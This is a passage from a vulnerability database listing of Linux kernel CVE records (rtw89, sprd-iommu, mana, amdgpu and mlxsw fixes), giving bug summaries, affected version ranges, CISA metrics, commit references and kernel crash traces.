0010:objagg_obj_parent_assign+0xb5/0xd0\n[...]\nCall Trace:\n \u003cTASK\u003e\n __objagg_obj_get+0x2bb/0x580\n objagg_obj_get+0xe/0x80\n mlxsw_sp_acl_erp_mask_get+0xb5/0xf0\n mlxsw_sp_acl_atcam_entry_add+0xe8/0x3c0\n mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0\n mlxsw_sp_acl_tcam_vchunk_migrate_one+0x16b/0x270\n mlxsw_sp_acl_tcam_vregion_rehash_work+0xbe/0x510\n process_one_work+0x151/0x370"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:26.245Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4dc09f6f260db3c4565a4ec52ba369393598f2fb"
},
{
"url": "https://git.kernel.org/stable/c/36a9996e020dd5aa325e0ecc55eb2328288ea6bb"
},
{
"url": "https://git.kernel.org/stable/c/9a5261a984bba4f583d966c550fa72c33ff3714e"
},
{
"url": "https://git.kernel.org/stable/c/25c6fd9648ad05da493a5d30881896a78a08b624"
},
{
"url": "https://git.kernel.org/stable/c/0e59c2d22853266704e127915653598f7f104037"
},
{
"url": "https://git.kernel.org/stable/c/fb5d4fc578e655d113f09565f6f047e15f7ab578"
},
{
"url": "https://git.kernel.org/stable/c/97d833ceb27dc19f8777d63f90be4a27b5daeedf"
}
],
"title": "mlxsw: spectrum_acl_erp: Fix object nesting warning",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43880",
"datePublished": "2024-08-21T00:06:32.562Z",
"dateReserved": "2024-08-17T09:11:59.287Z",
"dateUpdated": "2025-05-04T09:28:26.245Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43842 (GCVE-0-2024-43842)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: rtw89: Fix array index mistake in rtw89_sta_info_get_iter()
In rtw89_sta_info_get_iter() 'status->he_gi' is compared to array size.
But then 'rate->he_gi' is used as array index instead of 'status->he_gi'.
This can lead to go beyond array boundaries in case of 'rate->he_gi' is
not equal to 'status->he_gi' and is bigger than array size. Looks like
"copy-paste" mistake.
Fix this mistake by replacing 'rate->he_gi' with 'status->he_gi'.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43842",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:07:52.507676Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:22.419Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/realtek/rtw89/debug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a2a095c08b95372d6d0c5819b77f071af5e75366",
"status": "affected",
"version": "e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd",
"versionType": "git"
},
{
"lessThan": "7a0edc3d83aff3a48813d78c9cad9daf38decc74",
"status": "affected",
"version": "e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd",
"versionType": "git"
},
{
"lessThan": "96ae4de5bc4c8ba39fd072369398f59495b73f58",
"status": "affected",
"version": "e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd",
"versionType": "git"
},
{
"lessThan": "85099c7ce4f9e64c66aa397cd9a37473637ab891",
"status": "affected",
"version": "e3ec7017f6a20d12ddd9fe23d345ebb7b8c104dd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/realtek/rtw89/debug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw89: Fix array index mistake in rtw89_sta_info_get_iter()\n\nIn rtw89_sta_info_get_iter() \u0027status-\u003ehe_gi\u0027 is compared to array size.\nBut then \u0027rate-\u003ehe_gi\u0027 is used as array index instead of \u0027status-\u003ehe_gi\u0027.\nThis can lead to go beyond array boundaries in case of \u0027rate-\u003ehe_gi\u0027 is\nnot equal to \u0027status-\u003ehe_gi\u0027 and is bigger than array size. Looks like\n\"copy-paste\" mistake.\n\nFix this mistake by replacing \u0027rate-\u003ehe_gi\u0027 with \u0027status-\u003ehe_gi\u0027.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:29.471Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a2a095c08b95372d6d0c5819b77f071af5e75366"
},
{
"url": "https://git.kernel.org/stable/c/7a0edc3d83aff3a48813d78c9cad9daf38decc74"
},
{
"url": "https://git.kernel.org/stable/c/96ae4de5bc4c8ba39fd072369398f59495b73f58"
},
{
"url": "https://git.kernel.org/stable/c/85099c7ce4f9e64c66aa397cd9a37473637ab891"
}
],
"title": "wifi: rtw89: Fix array index mistake in rtw89_sta_info_get_iter()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43842",
"datePublished": "2024-08-17T09:21:57.172Z",
"dateReserved": "2024-08-17T09:11:59.274Z",
"dateUpdated": "2025-05-04T09:27:29.471Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42277 (GCVE-0-2024-42277)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu: sprd: Avoid NULL deref in sprd_iommu_hw_en
In sprd_iommu_cleanup() before calling function sprd_iommu_hw_en()
dom->sdev is equal to NULL, which leads to null dereference.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 92c089a931fd3939cd32318cf4f54e69e8f51a19 Version: 8745f3592ee4a7b49ede16ddd3f12a41ecaa23c9 Version: 9afea57384d4ae7b2034593eac7fa76c7122762a Version: 9afea57384d4ae7b2034593eac7fa76c7122762a Version: 9afea57384d4ae7b2034593eac7fa76c7122762a Version: d0a917fd5e3b3ed9d9306b4260ba684b982da9f3 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42277",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:49.209899Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:31.475Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/sprd-iommu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8c79ceb4ecf823e6ec10fee6febb0fca3de79922",
"status": "affected",
"version": "92c089a931fd3939cd32318cf4f54e69e8f51a19",
"versionType": "git"
},
{
"lessThan": "dfe90030a0cfa26dca4cb6510de28920e5ad22fb",
"status": "affected",
"version": "8745f3592ee4a7b49ede16ddd3f12a41ecaa23c9",
"versionType": "git"
},
{
"lessThan": "b62841e49a2b7938f6fdeaaf93fb57e4eb880bdb",
"status": "affected",
"version": "9afea57384d4ae7b2034593eac7fa76c7122762a",
"versionType": "git"
},
{
"lessThan": "d5fe884ce28c5005f8582c35333c195a168f841c",
"status": "affected",
"version": "9afea57384d4ae7b2034593eac7fa76c7122762a",
"versionType": "git"
},
{
"lessThan": "630482ee0653decf9e2482ac6181897eb6cde5b8",
"status": "affected",
"version": "9afea57384d4ae7b2034593eac7fa76c7122762a",
"versionType": "git"
},
{
"status": "affected",
"version": "d0a917fd5e3b3ed9d9306b4260ba684b982da9f3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/sprd-iommu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.4"
},
{
"lessThan": "6.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.15.113",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "6.1.81",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: sprd: Avoid NULL deref in sprd_iommu_hw_en\n\nIn sprd_iommu_cleanup() before calling function sprd_iommu_hw_en()\ndom-\u003esdev is equal to NULL, which leads to null dereference.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:53.822Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8c79ceb4ecf823e6ec10fee6febb0fca3de79922"
},
{
"url": "https://git.kernel.org/stable/c/dfe90030a0cfa26dca4cb6510de28920e5ad22fb"
},
{
"url": "https://git.kernel.org/stable/c/b62841e49a2b7938f6fdeaaf93fb57e4eb880bdb"
},
{
"url": "https://git.kernel.org/stable/c/d5fe884ce28c5005f8582c35333c195a168f841c"
},
{
"url": "https://git.kernel.org/stable/c/630482ee0653decf9e2482ac6181897eb6cde5b8"
}
],
"title": "iommu: sprd: Avoid NULL deref in sprd_iommu_hw_en",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42277",
"datePublished": "2024-08-17T09:08:45.486Z",
"dateReserved": "2024-07-30T07:40:12.261Z",
"dateUpdated": "2025-05-04T12:57:53.822Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42069 (GCVE-0-2024-42069)
Vulnerability from cvelistv5
Published
2024-07-29 15:52
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: mana: Fix possible double free in error handling path
When auxiliary_device_add() returns error and then calls
auxiliary_device_uninit(), callback function adev_release
calls kfree(madev). We shouldn't call kfree(madev) again
in the error handling path. Set 'madev' to NULL.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:31.325Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3243e64eb4d897c3eeb48b2a7221ab5a95e1282a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed45c0a0b662079d4c0e518014cc148c753979b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1864b8224195d0e43ddb92a8151f54f6562090cc"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42069",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:19:49.454221Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:08.299Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/microsoft/mana/mana_en.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3243e64eb4d897c3eeb48b2a7221ab5a95e1282a",
"status": "affected",
"version": "a69839d4327d053b18d8e1b0e7ddeee78db78f4f",
"versionType": "git"
},
{
"lessThan": "ed45c0a0b662079d4c0e518014cc148c753979b4",
"status": "affected",
"version": "a69839d4327d053b18d8e1b0e7ddeee78db78f4f",
"versionType": "git"
},
{
"lessThan": "1864b8224195d0e43ddb92a8151f54f6562090cc",
"status": "affected",
"version": "a69839d4327d053b18d8e1b0e7ddeee78db78f4f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/microsoft/mana/mana_en.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.2"
},
{
"lessThan": "6.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mana: Fix possible double free in error handling path\n\nWhen auxiliary_device_add() returns error and then calls\nauxiliary_device_uninit(), callback function adev_release\ncalls kfree(madev). We shouldn\u0027t call kfree(madev) again\nin the error handling path. Set \u0027madev\u0027 to NULL."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:17.540Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3243e64eb4d897c3eeb48b2a7221ab5a95e1282a"
},
{
"url": "https://git.kernel.org/stable/c/ed45c0a0b662079d4c0e518014cc148c753979b4"
},
{
"url": "https://git.kernel.org/stable/c/1864b8224195d0e43ddb92a8151f54f6562090cc"
}
],
"title": "net: mana: Fix possible double free in error handling path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42069",
"datePublished": "2024-07-29T15:52:33.273Z",
"dateReserved": "2024-07-29T15:50:41.168Z",
"dateUpdated": "2025-05-04T09:22:17.540Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43895 (GCVE-0-2024-43895)
Vulnerability from cvelistv5
Published
2024-08-26 10:10
Modified
2025-05-21 09:13
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Skip Recompute DSC Params if no Stream on Link
[why]
Encounter NULL pointer dereference uner mst + dsc setup.
BUG: kernel NULL pointer dereference, address: 0000000000000008
PGD 0 P4D 0
Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 4 PID: 917 Comm: sway Not tainted 6.3.9-arch1-1 #1 124dc55df4f5272ccb409f39ef4872fc2b3376a2
Hardware name: LENOVO 20NKS01Y00/20NKS01Y00, BIOS R12ET61W(1.31 ) 07/28/2022
RIP: 0010:drm_dp_atomic_find_time_slots+0x5e/0x260 [drm_display_helper]
Code: 01 00 00 48 8b 85 60 05 00 00 48 63 80 88 00 00 00 3b 43 28 0f 8d 2e 01 00 00 48 8b 53 30 48 8d 04 80 48 8d 04 c2 48 8b 40 18 <48> 8>
RSP: 0018:ffff960cc2df77d8 EFLAGS: 00010293
RAX: 0000000000000000 RBX: ffff8afb87e81280 RCX: 0000000000000224
RDX: ffff8afb9ee37c00 RSI: ffff8afb8da1a578 RDI: ffff8afb87e81280
RBP: ffff8afb83d67000 R08: 0000000000000001 R09: ffff8afb9652f850
R10: ffff960cc2df7908 R11: 0000000000000002 R12: 0000000000000000
R13: ffff8afb8d7688a0 R14: ffff8afb8da1a578 R15: 0000000000000224
FS: 00007f4dac35ce00(0000) GS:ffff8afe30b00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000008 CR3: 000000010ddc6000 CR4: 00000000003506e0
Call Trace:
<TASK>
? __die+0x23/0x70
? page_fault_oops+0x171/0x4e0
? plist_add+0xbe/0x100
? exc_page_fault+0x7c/0x180
? asm_exc_page_fault+0x26/0x30
? drm_dp_atomic_find_time_slots+0x5e/0x260 [drm_display_helper 0e67723696438d8e02b741593dd50d80b44c2026]
? drm_dp_atomic_find_time_slots+0x28/0x260 [drm_display_helper 0e67723696438d8e02b741593dd50d80b44c2026]
compute_mst_dsc_configs_for_link+0x2ff/0xa40 [amdgpu 62e600d2a75e9158e1cd0a243bdc8e6da040c054]
? fill_plane_buffer_attributes+0x419/0x510 [amdgpu 62e600d2a75e9158e1cd0a243bdc8e6da040c054]
compute_mst_dsc_configs_for_state+0x1e1/0x250 [amdgpu 62e600d2a75e9158e1cd0a243bdc8e6da040c054]
amdgpu_dm_atomic_check+0xecd/0x1190 [amdgpu 62e600d2a75e9158e1cd0a243bdc8e6da040c054]
drm_atomic_check_only+0x5c5/0xa40
drm_mode_atomic_ioctl+0x76e/0xbc0
[how]
dsc recompute should be skipped if no mode change detected on the new
request. If detected, keep checking whether the stream is already on
current state or not.
(cherry picked from commit 8151a6c13111b465dbabe07c19f572f7cbd16fef)
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43895",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:29:09.570275Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:08.496Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "282f0a482ee61d5e863512f3c4fcec90216c20d9",
"status": "affected",
"version": "a550bb165b3f9ed92d6c335e1ea191bf28bb4e0f",
"versionType": "git"
},
{
"lessThan": "718d83f66fb07b2cab89a1fc984613a00e3db18f",
"status": "affected",
"version": "a550bb165b3f9ed92d6c335e1ea191bf28bb4e0f",
"versionType": "git"
},
{
"lessThan": "70275bb960c71d313254473d38c14e7101cee5ad",
"status": "affected",
"version": "a550bb165b3f9ed92d6c335e1ea191bf28bb4e0f",
"versionType": "git"
},
{
"lessThan": "50e376f1fe3bf571d0645ddf48ad37eb58323919",
"status": "affected",
"version": "a550bb165b3f9ed92d6c335e1ea191bf28bb4e0f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Skip Recompute DSC Params if no Stream on Link\n\n[why]\nEncounter NULL pointer dereference uner mst + dsc setup.\n\nBUG: kernel NULL pointer dereference, address: 0000000000000008\n PGD 0 P4D 0\n Oops: 0000 [#1] PREEMPT SMP NOPTI\n CPU: 4 PID: 917 Comm: sway Not tainted 6.3.9-arch1-1 #1 124dc55df4f5272ccb409f39ef4872fc2b3376a2\n Hardware name: LENOVO 20NKS01Y00/20NKS01Y00, BIOS R12ET61W(1.31 ) 07/28/2022\n RIP: 0010:drm_dp_atomic_find_time_slots+0x5e/0x260 [drm_display_helper]\n Code: 01 00 00 48 8b 85 60 05 00 00 48 63 80 88 00 00 00 3b 43 28 0f 8d 2e 01 00 00 48 8b 53 30 48 8d 04 80 48 8d 04 c2 48 8b 40 18 \u003c48\u003e 8\u003e\n RSP: 0018:ffff960cc2df77d8 EFLAGS: 00010293\n RAX: 0000000000000000 RBX: ffff8afb87e81280 RCX: 0000000000000224\n RDX: ffff8afb9ee37c00 RSI: ffff8afb8da1a578 RDI: ffff8afb87e81280\n RBP: ffff8afb83d67000 R08: 0000000000000001 R09: ffff8afb9652f850\n R10: ffff960cc2df7908 R11: 0000000000000002 R12: 0000000000000000\n R13: ffff8afb8d7688a0 R14: ffff8afb8da1a578 R15: 0000000000000224\n FS: 00007f4dac35ce00(0000) GS:ffff8afe30b00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000008 CR3: 000000010ddc6000 CR4: 00000000003506e0\n Call Trace:\n\u003cTASK\u003e\n ? __die+0x23/0x70\n ? page_fault_oops+0x171/0x4e0\n ? plist_add+0xbe/0x100\n ? exc_page_fault+0x7c/0x180\n ? asm_exc_page_fault+0x26/0x30\n ? drm_dp_atomic_find_time_slots+0x5e/0x260 [drm_display_helper 0e67723696438d8e02b741593dd50d80b44c2026]\n ? drm_dp_atomic_find_time_slots+0x28/0x260 [drm_display_helper 0e67723696438d8e02b741593dd50d80b44c2026]\n compute_mst_dsc_configs_for_link+0x2ff/0xa40 [amdgpu 62e600d2a75e9158e1cd0a243bdc8e6da040c054]\n ? fill_plane_buffer_attributes+0x419/0x510 [amdgpu 62e600d2a75e9158e1cd0a243bdc8e6da040c054]\n compute_mst_dsc_configs_for_state+0x1e1/0x250 [amdgpu 62e600d2a75e9158e1cd0a243bdc8e6da040c054]\n amdgpu_dm_atomic_check+0xecd/0x1190 [amdgpu 62e600d2a75e9158e1cd0a243bdc8e6da040c054]\n drm_atomic_check_only+0x5c5/0xa40\n drm_mode_atomic_ioctl+0x76e/0xbc0\n\n[how]\ndsc recompute should be skipped if no mode change detected on the new\nrequest. If detected, keep checking whether the stream is already on\ncurrent state or not.\n\n(cherry picked from commit 8151a6c13111b465dbabe07c19f572f7cbd16fef)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:13:06.378Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/282f0a482ee61d5e863512f3c4fcec90216c20d9"
},
{
"url": "https://git.kernel.org/stable/c/718d83f66fb07b2cab89a1fc984613a00e3db18f"
},
{
"url": "https://git.kernel.org/stable/c/70275bb960c71d313254473d38c14e7101cee5ad"
},
{
"url": "https://git.kernel.org/stable/c/50e376f1fe3bf571d0645ddf48ad37eb58323919"
}
],
"title": "drm/amd/display: Skip Recompute DSC Params if no Stream on Link",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43895",
"datePublished": "2024-08-26T10:10:50.934Z",
"dateReserved": "2024-08-17T09:11:59.291Z",
"dateUpdated": "2025-05-21T09:13:06.378Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42228 (GCVE-0-2024-42228)
Vulnerability from cvelistv5
Published
